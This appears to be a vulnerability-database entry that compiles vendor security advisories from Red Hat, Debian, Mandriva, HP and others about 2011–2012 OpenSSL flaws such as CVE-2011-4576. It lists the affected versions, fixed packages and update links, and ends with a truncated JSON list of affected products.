The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL prone to multiple security vulnerabilities. An attacker may leverage these issues to obtain sensitive information, cause a denial-of-service condition and perform unauthorized actions. Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.
Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code.
Warning: Before applying this update, back up your JBoss Enterprise Application Platform's "server/[PROFILE]/deploy/" directory, along with all other customized configuration files. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing JBoss Enterprise Application Platform installation (including all applications and configuration files).
JBoss server instances configured to use the Tomcat Native library must be restarted for this update to take effect. HP System Management Homepage (SMH) before v7.1.1 running on Linux and Windows. HP System Management Homepage v7.1.1 is available here:
HP System Management Homepage for Windows x64
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4064%257CswLang%253D8%257CswItem%253DMTX-ab 0d4e9bb4654a8da503eccfd9%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Windows x86
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4022%257CswLang%253D8%257CswItem%253DMTX-f7 c0d15d28474255bd0ec23136%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Linux (AMD64/EM64T)
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4035%257CswLang%253D8%257CswItem%253DMTX-18 d373dd1361400fbaca892942%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Linux (x86)
[Download here] or enter the following URL into the browser address window. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: rhev-hypervisor5 security and bug fix update Advisory ID: RHSA-2012:0168-01 Product: Red Hat Enterprise Virtualization Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0168.html Issue date: 2012-02-21 CVE Names: CVE-2011-4109 CVE-2011-4576 CVE-2011-4619 CVE-2012-0029 CVE-2012-0207 =====================================================================
- Summary:
An updated rhev-hypervisor5 package that fixes several security issues and various bugs is now available.
The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
RHEV Hypervisor for RHEL-5 - noarch
- Description:
The rhev-hypervisor5 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: A subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent.
Note: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions.
A heap overflow flaw was found in the way QEMU-KVM emulated the e1000 network interface card. A privileged guest user in a virtual machine whose network interface is configured to use the e1000 emulated driver could use this flaw to crash the host or, possibly, escalate their privileges on the host. (CVE-2012-0029)
A divide-by-zero flaw was found in the Linux kernel's igmp_heard_query() function. An attacker able to send certain IGMP (Internet Group Management Protocol) packets to a target system could use this flaw to cause a denial of service. (CVE-2012-0207)
A double free flaw was discovered in the policy checking code in OpenSSL. A remote attacker could use this flaw to crash an application that uses OpenSSL by providing an X.509 certificate that has specially-crafted policy extension data. (CVE-2011-4109)
An information leak flaw was found in the SSL 3.0 protocol implementation in OpenSSL. (CVE-2011-4576)
It was discovered that OpenSSL did not limit the number of TLS/SSL handshake restarts required to support Server Gated Cryptography. A remote attacker could use this flaw to make a TLS/SSL server using OpenSSL consume an excessive amount of CPU by continuously restarting the handshake. (CVE-2011-4619)
Red Hat would like to thank Nicolae Mogoreanu for reporting CVE-2012-0029, and Simon McVittie for reporting CVE-2012-0207.
This updated package provides updated components that include fixes for various security issues. These issues have no security impact on Red Hat Enterprise Virtualization Hypervisor itself, however. The security fixes included in this update address the following CVE numbers:
CVE-2006-1168 and CVE-2011-2716 (busybox issues)
CVE-2009-5029, CVE-2009-5064, CVE-2010-0830 and CVE-2011-1089 (glibc issues)
CVE-2011-1083, CVE-2011-3638, CVE-2011-4086, CVE-2011-4127 and CVE-2012-0028 (kernel issues)
CVE-2011-1526 (krb5 issue)
CVE-2011-4347 (kvm issue)
CVE-2010-4008, CVE-2011-0216, CVE-2011-2834, CVE-2011-3905, CVE-2011-3919 and CVE-2011-1944 (libxml2 issues)
CVE-2011-1749 (nfs-utils issue)
CVE-2011-4108 (openssl issue)
CVE-2011-0010 (sudo issue)
CVE-2011-1675 and CVE-2011-1677 (util-linux issues)
CVE-2010-0424 (vixie-cron issue)
This updated rhev-hypervisor5 package fixes various bugs. Documentation of these changes will be available shortly in the Technical Notes document:
https://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Virtualization_for_Servers/2.2/html/Technical_Notes/index.html
Users of Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package, which fixes these issues.
- Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259
- Bugs fixed (http://bugzilla.redhat.com/):
606191 - after upgrade , reboot can't shut off network successfully and back to firstboot menu again 627538 - System will not boot sometimes when using rhevm to do upgrade twice. 650179 - rhevm bridge came up instead of breth0 after fail to configure network 675325 - Changes to networking always clear the contents of resolv.conf 696875 - RHEVH bootup hanging in ovirt-early when doing LVM scanning 717535 - [RFE] No confirm message for ntp server setting 728895 - RHEV-H rpm should include a versions text file 732948 - CCISS: Auto install fail at creating physical volume. 734110 - rhevh - upgrade ovirt node fails due to nonexistent breth0 734480 - [RFE] Add virt-who package to RHEVH 734710 - Register RHN satellite will fail if RHN satellite password include space. 740127 - Provide our CPE name in a new system file 743938 - Make rhev-hypervisor RPM multi-installable like the kernel 747519 - RHEV-H 5.8 register to RHN will fail. 747647 - Change rhev-hypervisor RPM to be rhev-hypervisor5 to allow coinstallations with rhev-hypervisor6 756178 - remove redundant brcm-iscsi.log rotation from ovirt-node now that it is in iscsi-initiator-utils 758465 - RHEV-H 5.8 register to RHN will fail if password contains quotes or spaces 759462 - Can not retrieve running guests UUID in RHEVH node. 759632 - virt-who debugging output going to stderr always 759635 - Revert workaround of virt-who output 761357 - Multipathd service is stopped by default cause change password failed in single mode. 768256 - network layout is incorrect when configure network with nic up 771771 - CVE-2011-4109 openssl: double-free in policy checks 771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding 771780 - CVE-2011-4619 openssl: SGC restart DoS attack 772075 - CVE-2012-0029 qemu-kvm: e1000: process_tx_desc legacy mode packets heap overflow 772867 - CVE-2012-0207 kernel: igmp: Avoid zero delay when receiving odd mixture of IGMP queries 783625 - The setup command should only allow password setting and viewing logs in single mode.
- Package List:
RHEV Hypervisor for RHEL-5:
noarch: rhev-hypervisor5-5.8-20120202.0.el5.noarch.rpm rhev-hypervisor5-tools-5.8-20120202.0.el5.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2011-4109.html https://www.redhat.com/security/data/cve/CVE-2011-4576.html https://www.redhat.com/security/data/cve/CVE-2011-4619.html https://www.redhat.com/security/data/cve/CVE-2012-0029.html https://www.redhat.com/security/data/cve/CVE-2012-0207.html https://access.redhat.com/security/updates/classification/#important https://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Virtualization_for_Servers/2.2/html/Technical_Notes/index.html
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPQ1yHXlSAg2UNWIIRAl9/AJ9JmPpSO5U2xwDBKDZA8y5To8EVcwCfZFGN bzF952CZ/r5T3LUF9kY6X8c= =IdNq -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . The Common Vulnerabilities and Exposures project identifies the following vulnerabilities:
CVE-2011-4108 The DTLS implementation performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack.
CVE-2011-4109 A double free vulnerability when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to cause applications crashes and potentially allow execution of arbitrary code by triggering failure of a policy check.
CVE-2011-4354 On 32-bit systems, the operations on NIST elliptic curves P-256 and P-384 are not correctly implemented, potentially leaking the private ECC key of a TLS server.
For the oldstable distribution (lenny), these problems have been fixed in version 0.9.8g-15+lenny15.
For the stable distribution (squeeze), these problems have been fixed in version 0.9.8o-4squeeze5.
For the testing distribution (wheezy) and the unstable distribution (sid), these problems have been fixed in version 1.0.0f-1.
We recommend that you upgrade your openssl packages. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ .
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4108 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4109 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4576 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4619 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0027 http://www.openssl.org/news/secadv_20120104.txt
Updated Packages:
Mandriva Linux 2011: 2291c13c44539a5e25f58750a5d6bf8f 2011/i586/libopenssl1.0.0-1.0.0d-2.2-mdv2011.0.i586.rpm c610330d2c4c7397feb126247b1fa94f 2011/i586/libopenssl-devel-1.0.0d-2.2-mdv2011.0.i586.rpm 36c86a84320e1c8a17a74e4e68bc7d5a 2011/i586/libopenssl-engines1.0.0-1.0.0d-2.2-mdv2011.0.i586.rpm 4b8054f2c169d2b3223195053bd15802 2011/i586/libopenssl-static-devel-1.0.0d-2.2-mdv2011.0.i586.rpm 3c48b209b941a83a6acfef439c3f78b7 2011/i586/openssl-1.0.0d-2.2-mdv2011.0.i586.rpm 7af9d175d066db069aeb82248df9772b 2011/SRPMS/openssl-1.0.0d-2.2.src.rpm
Mandriva Linux 2011/X86_64: 21a50bd2be83839266f033c9a0f0fabc 2011/x86_64/lib64openssl1.0.0-1.0.0d-2.2-mdv2011.0.x86_64.rpm 7e80ee8e2d445c5f1985cd52d2316658 2011/x86_64/lib64openssl-devel-1.0.0d-2.2-mdv2011.0.x86_64.rpm e1f4faa3162a6bbc14b37e4cb8d1e8e2 2011/x86_64/lib64openssl-engines1.0.0-1.0.0d-2.2-mdv2011.0.x86_64.rpm 6e3ac6d57cf0f4e13ed8e275a9bd2ff8 2011/x86_64/lib64openssl-static-devel-1.0.0d-2.2-mdv2011.0.x86_64.rpm e9e0306f8dc9f398915a646547e262e2 2011/x86_64/openssl-1.0.0d-2.2-mdv2011.0.x86_64.rpm 7af9d175d066db069aeb82248df9772b 2011/SRPMS/openssl-1.0.0d-2.2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
Now, if no valid disks are found for Hypervisor installation, a message is displayed informing the user that there are no valid disks for installation. (BZ#781471)
- Previously, the user interface for the Hypervisor did not indicate whether the system was registered with Red Hat Network (RHN) Classic or RHN Satellite. As a result, customers could not easily determine the registration status of their Hypervisor installations.
The TUI has been updated to display the registration status of the Hypervisor. (BZ#788223)
-
Previously, autoinstall would fail if the firstboot or reinstall options were passed but local_boot or upgrade were not passed. Now, neither the local_boot or upgrade parameters are required for autoinstall. 788225 - autoinstall fails when local_boot or upgrade not passed on command line 788226 - rhev-hypervisor6 6.2 Update 2 Release bugzilla
Release Date: 2012-01-19 Last Updated: 2012-01-19
Potential Security Impact: Remote Denial of Service (DoS), unauthorized access
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX OpenSSL. This vulnerability could be exploited remotely to create a Denial of Service (DoS) or to gain unauthorized access.
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL before vA.00.09.08s.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2011-3210 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2011-4109 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 9.3 CVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided upgrades to resolve this vulnerability. The upgrades are available from the following location ftp://ossl098s:Secure12@ftp.usa.hp.com
HP-UX Release / Depot Name
B.11.11 PA (32 and 64) / OpenSSL_A.00.09.08s.001_HP-UX_B.11.11_32+64.depot
B.11.23 (PA and IA) / OpenSSL_A.00.09.08s.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (PA and IA) / OpenSSL_A.00.09.08s.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08s or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08s.001 or subsequent
HP-UX B.11.23
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08s.002 or subsequent
HP-UX B.11.31
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08s.003 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) 19 January 2012 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201201-0030", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "esx", "scope": "eq", "trust": 1.1, "vendor": "vmware", "version": "3.5" }, { "model": "esxi", "scope": "eq", "trust": 1.1, "vendor": "vmware", "version": "5.0" }, { "model": "esxi", "scope": "eq", "trust": 1.1, "vendor": "vmware", "version": "3.5" }, { "model": "esx", "scope": "eq", "trust": 1.1, "vendor": "vmware", "version": "4.0" }, { "model": "esx", "scope": "eq", "trust": 1.1, "vendor": "vmware", "version": "4.1" }, { "model": "esxi", "scope": "eq", "trust": 1.1, "vendor": "vmware", "version": "4.1" }, { "model": "esxi", "scope": "eq", "trust": 1.1, "vendor": "vmware", "version": "4.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.4" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7f" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8c" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.5" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.5a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6b" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "efi", "version": null }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.6.8" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.7 to v10.7.5" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.x" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.8 to v10.8.3" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.0f" }, { "model": "mac os x server", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.6.8" }, { "model": "mac os x server", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.7 to v10.7.5" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.2" }, { "model": "aura system platform", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "hardware management console 7r7.7.0", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux enterprise sdk sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.41" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.1" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "aura system manager", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux amd64", "scope": "eq", "trust": 